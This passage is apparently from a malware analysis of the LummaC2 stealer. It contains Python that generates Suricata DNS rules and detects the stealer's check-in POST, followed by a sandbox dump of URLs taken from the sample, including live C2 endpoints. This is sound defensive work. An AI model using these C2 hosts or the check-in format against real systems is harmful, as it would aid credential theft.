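def suricata_dns_rules(c2_domains=LUMMA_CONFIG["C2 url"], sid_base=LOCAL_SID_BASE):
    """One Suricata rule per C2 domain, matching the domain and its subdomains in
    the DNS query name. dns.query, dotprefix and endswith need Suricata >= 5."""
    rules = []
    for i, d in enumerate(sorted(c2_domains)):
        rules.append(
            'alert dns $HOME_NET any -> any any ('
            f'msg:"LOCAL MALWARE LummaC2 CnC domain in DNS lookup ({d})"; '
            f'dns.query; dotprefix; content:".{d}"; nocase; endswith; '
            f'classtype:trojan-activity; sid:{sid_base + i}; rev:1;)'
        )
    return rules


def lumma_checkin(req):
    """Return the lid value if `req` looks like the LummaC check-in POST seen in
    the report, else None.

    req: {"method", "path", "headers" (dict), "body" (str)}.
    Criteria come from the observed traffic and the decrypted strings:
    POST /api, application/x-www-form-urlencoded, body lid=<v>&j=<v>&ver=4.0.
    The User-Agent is deliberately not a criterion: the decrypted string is
    "TeslaBrowser/5.5", but this sample sent a Chrome/119 UA on the wire.
    """
    if req.get("method") != "POST" or req.get("path") != "/api":
        return None
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    if "application/x-www-form-urlencoded" not in headers.get("content-type", "").lower():
        return None
    body = req.get("body", "")
    if not CHECKIN_BODY_RE.match(body):
        return None
    return parse_qs(body)["lid"][0]


def triage(dns_names, requests):
    """Run both checks over telemetry and return the hits."""
    return {
        "c2_dns": [n for n in dns_names if is_c2_domain(n)],
        "checkins": [(r["headers"].get("Host"), lid)
                     for r in requests if (lid := lumma_checkin(r))],
    }


# CONSTRUCTED sample telemetry (not the report's captured traffic).
SAMPLE_DNS = ["clearancek.site", "cdn.bathdoomgaz.store", "steamcommunity.com",
              "notclearancek.site"]
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/api",
     "headers": {"Host": "sergei-esenin.com",
                 "Content-Type": "application/x-www-form-urlencoded",
                 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/119.0.0.0"},
     "body": "lid=CONSTRUCTED-ID&j=abc&ver=4.0"},
    {"method": "POST", "path": "/api",
     "headers": {"Host": "example.test", "Content-Type": "application/json"},
     "body": '{"lid": "x"}'},
    {"method": "GET", "path": "/profiles/76561199724331900",
     "headers": {"Host": "steamcommunity.com"}, "body": ""},
]

if __name__ == "__main__":
    for rule in suricata_dns_rules():
        print(rule)
    print(triage(SAMPLE_DNS, SAMPLE_REQUESTS))
```

    Two caveats from the report itself. First, the sample's first POST to /api carried an 8-byte body, which is too short for the lid=...&ver=4.0 template, so the body matcher only fires on the second request (Content-Length 52, sent with a Cloudflare bypass cookie); correlate on the host and the preceding DNS activity rather than on the body alone. Second, the host that actually received the check-in, sergei-esenin.com, is not among the eight domains in the static configuration, and the request was preceded by a GET of a steamcommunity.com profile page; the report does not show how that host was obtained, so blocking only the configured domains is not sufficient coverage.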
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.akamai.steamstatic
    Source: file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bathdoomgaz.store:443/api
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
    Source: file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://clearancek.site:443/api
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dissapoiznw.store:443/api
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://eaglepawnoy.store:443/apiP
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://licendfilteo.site:443/api
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/0
    Source: file.exe, 00000000.00000002.1951560374.00000000012B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/C:
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.00000000012B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/api0
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/apiA
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/apirt.c
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
    Source: file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://studennotediw.store:443/api
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749627824.0000000001326000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-manag
    Source: file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749627824.0000000001326000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
